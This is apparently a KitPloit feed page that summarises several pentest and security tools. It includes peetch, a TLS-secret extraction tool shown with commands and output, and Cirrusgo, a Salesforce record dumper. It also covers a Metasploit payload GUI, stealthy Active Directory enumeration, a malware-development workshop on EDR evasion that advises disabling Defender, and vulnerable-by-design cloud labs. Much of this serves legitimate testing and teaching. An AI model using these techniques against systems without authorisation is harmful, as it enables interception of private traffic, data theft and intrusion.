πŸ”’
❌
There are new articles available, click to refresh the page.
Yesterday β€” 7 August 2022KitPloit - PenTest & Hacking Tools

BlackStone - Pentesting Reporting Tool

7 August 2022 at 12:30
By: Zion3R

Pentesting Reporting Tool (1)


BlackStone project or "BlackStone Project" is a tool created in order to automate the work of drafting and submitting a report on audits of ethical hacking or pentesting.

In this tool we can register in the database the vulnerabilities that we find in the audit, classifying them by internal, external audit or wifi, in addition, we can put your description and recommendation, as well as the level of severity and effort for its correction. This information will then help us generate in the report a criticality table as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...


Pentesting Reporting Tool (2)

Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool, in my case I use Mamp (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts we will go to c://MAMP/htdocs and paste all the contents of the downloaded folder "BlackStone"
  • For the application to work we will have to import the database, we will go to our browser and write "localhost/phpMyAdmin/", you have the database connection file in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens:

Pentesting Reporting Tool (3)

After having vulnerabilities in the database, we will go to the audited client and we will register a client along with their web page, once registered we can go to customer details and we can see the following information:

THE USE OF THIS APPLICATION IS FOR PROFESSIONAL USE, THE AUTHOR IS NOT RESPONSIBLE FOR A MISUSE EMPLOYED

  • Name of business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Exposed password check on the company owner's deep web
  • Subdomains of the website as well as information of interest found in google
  • Emails of company workers

Pentesting Reporting Tool (4)

Once we have the company that we are going to audit registered in the database, we will create a report, adding the date, name of the report and the company to which will be audited. When we register the report, we will give it edit and then we will select the vulnerabilities that we want to appear in the report:

Pentesting Reporting Tool (5)

Finally, we will generate the report by clicking on the "overview report" button, and later we will save the page that is generated as ".mht", then we will open it with Word to be able to work on the generated report:

Pentesting Reporting Tool (6)



Before yesterdayKitPloit - PenTest & Hacking Tools

Pict - Post-Infection Collection Toolkit

6 August 2022 at 12:30
By: Zion3R


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



Peetch - An eBPF Playground

5 August 2022 at 12:30
By: Zion3R


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first called dump aims to sniff network traffic by associating information about the source process with each packet. The second called tls allows to identify processes using OpenSSL to extract cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies including non-merged modifications of bcc and Scapy. A Docker image can be easily built in order to easily test peetch using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be store to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying process that uses OpenSSl and makes it is to dump several things like plaintext and secrets.

By default, peetch tls will only display one line per process, the --directions argument makes it possible to display the exchanges messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets arguments will display TLS Master Secrets extracted from memory. The following example leverages --write to write master secrets to discuss to simplify decruypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 -http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

4 August 2022 at 12:30
By: Zion3R


A fast tool to scan SAAS,PAAS App written in Go

SAAS App Support :

  • salesforce
  • contentful (next version)

Note flag -o output not working

install : golang 1.18Ver

go install -v github.com/Ph33rr/cirrusgo/cmd/[email protected]
or
go install -v github.com/Ph33rr/CirrusGo/cmd/[email protected]


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
entDocument,ContentVersion,ContentBody,CaseComment,Not
e,Employee,Attachment,EmailMessage,CaseExternalDocumen
t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the recode id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://loclhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirusgo salesforce -u https://localhost/ -cw



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

3 August 2022 at 12:30
By: Zion3R

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

For Generating APK Payload select Raw format in dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Twitter: @iFalah

Email: [email protected]

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

1 August 2022 at 12:30
By: Zion3R


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



PR-DNSd - Passive-Recursive DNS Daemon

1 August 2022 at 02:09
By: Zion3R


Passive-Recursive DNS daemon.


Quickstart

nameserver 127.0.0.1 | sudo tee /etc/resolv.conf dig google.com dig -x $(dig +short google.com)">
go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
-silent
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS serv er (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)


Maldev-For-Dummies - A Workshop About Malware Development

29 July 2022 at 12:30
By: Zion3R


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.

Β 

Workshop Description

With antivirus (AV) and Enterprise Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just as fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio, and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop):Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

β„Ή
Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

β„Ή
Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc filename.exe /unsafe

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool

28 July 2022 at 12:30
By: Zion3R


TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID Cloud Service Company Types Of Cloud Services Vulnerable Environment
1 Alibaba Cloud Networking VPC Security Group Open All Ports
2 Alibaba Cloud Networking VPC Security Group Open Common Ports
3 Alibaba Cloud Object Storage Bucket HTTP Enable
4 Alibaba Cloud Object Storage Object ACL Writable
5 Alibaba Cloud Object Storage Object ACL Readable
6 Alibaba Cloud Object Storage Special Bucket Policy
7 Alibaba Cloud Object Storage Bucket Public Access
8 Alibaba Cloud Object Storage Object Public Access
9 Alibaba Cloud Object Storage Bucket Logging Disable
10 Alibaba Cloud Object Storage Bucket Policy Readable
11 Alibaba Cloud Object Storage Bucket Object Traversal
12 Alibaba Cloud Object Storage Unrestricted File Upload
13 Alibaba Cloud Object Storage Server Side Encryption No KMS Set
14 Alibaba Cloud Object Storage Server Side Encryption Not Using BYOK
15 Alibaba Cloud Elastic Computing Service ECS SSRF
16 Alibaba Cloud Elastic Computing Service ECS Unattached Disks Are Unencrypted
17 Alibaba Cloud Elastic Computing Service ECS Virtual Machine Disks Are Unencrypted
18 Tencent Cloud Networking VPC Security Group Open All Ports
19 Tencent Cloud Networking VPC Security Group Open Common Ports
20 Tencent Cloud Object Storage Bucket ACL Writable
21 Tencent Cloud Object Storage Bucket ACL Readable
22 Tencent Cloud Object Storage Bucket Public Access
23 Tencent Cloud Object Storage Object Public Access
24 Tencent Cloud Object Storage Unrestricted File Upload
25 Tencent Cloud Object Storage Bucket Object Traversal
26 Tencent Cloud Object Storage Bucket Logging Disable
27 Tencent Cloud Object Storage Server Side Encryption Disable
28 Tencent Cloud Elastic Computing Service CVM SSRF
29 Tencent Cloud Elastic Computing Service CBS Storage Are Not Used
30 Tencent Cloud Elastic Computing Service CVM Virtual Machine Disks Are Unencrypted
31 Huawei Cloud Networking ECS Unsafe Security Group
32 Huawei Cloud Object Storage Object ACL Writable
33 Huawei Cloud Object Storage Special Bucket Policy
34 Huawei Cloud Object Storage Unrestricted File Upload
35 Huawei Cloud Object Storage Bucket Object Traversal
36 Huawei Cloud Object Storage Wrong Policy Causes Arbitrary File Uploads
37 Huawei Cloud Elastic Computing Service ECS SSRF
38 Huawei Cloud Relational Database Service RDS Mysql Baseline Checking Environment
39 Amazon Web Services Networking VPC Security Group Open All Ports
40 Amazon Web Services Networking VPC Security Group Open Common Ports
41 Amazon Web Services Object Storage Object ACL Writable
42 Amazon Web Services Object Storage Bucket ACL Writable
43 Amazon Web Services Object Storage Bucket ACL Readable
44 Amazon Web Services Object Storage MFA Delete Is Disable
45 Amazon Web Services Object Storage Special Bucket Policy
46 Amazon Web Services Object Storage Bucket Object Traversal
47 Amazon Web Services Object Storage Unrestricted File Upload
48 Amazon Web Services Object Storage Bucket Logging Disable
49 Amazon Web Services Object Storage Bucket Allow HTTP Access
50 Amazon Web Services Object Storage Bucket Default Encryption Disable
51 Amazon Web Services Elastic Computing Service EC2 SSRF
52 Amazon Web Services Elastic Computing Service Console Takeover
53 Amazon Web Services Elastic Computing Service EBS Volumes Are Not Used
54 Amazon Web Services Elastic Computing Service EBS Volumes Encryption Is Disabled
55 Amazon Web Services Elastic Computing Service Snapshots Of EBS Volumes Are Unencrypted
56 Amazon Web Services Identity and Access Management IAM Privilege Escalation
57 Google Cloud Platform Object Storage Object ACL Writable
58 Google Cloud Platform Object Storage Bucket ACL Writable
59 Google Cloud Platform Object Storage Bucket Object Traversal
60 Google Cloud Platform Object Storage Unrestricted File Upload
61 Google Cloud Platform Elastic Computing Service VM Command Execution
62 Microsoft Azure Object Storage Blob Public Access
63 Microsoft Azure Object Storage Container Blob Traversal
64 Microsoft Azure Elastic Computing Service VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine environment support, Docker Engine installation can be found in https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash


Β 

cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



The program prompts Enter a value:, type yes and enter, use curl to access the bucket, you can see the object traversed.



To avoid the cloud service from continuing to incur charges, remember to destroy the scenario in time after using it.

terraform destroy

οš€
Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following command under the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README of each vulnerable environment is executed within the TerraformGoat container environment, so the TerraformGoat container environment needs to be deployed first.
  2. Due to the horizontal risk of intranet horizontal on the cloud in some scenarios, it is strongly recommended that users use their own test accounts to configure the scenarios, avoid using the cloud account of the production environment, and install TerraformGoat using Dockerfile to isolate the user's local cloud vendor token and the test account token.
  3. TerraformGoat is used for educational purposes only, It is not allowed to use it for illegal and criminal purposes, any consequences arising from TerraformGoat are the responsibility of the person using it, and not the selefra organization.


Contributing

Contributions are welcomed and greatly appreciated. Further reading β€” CONTRIBUTING.md for details on contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



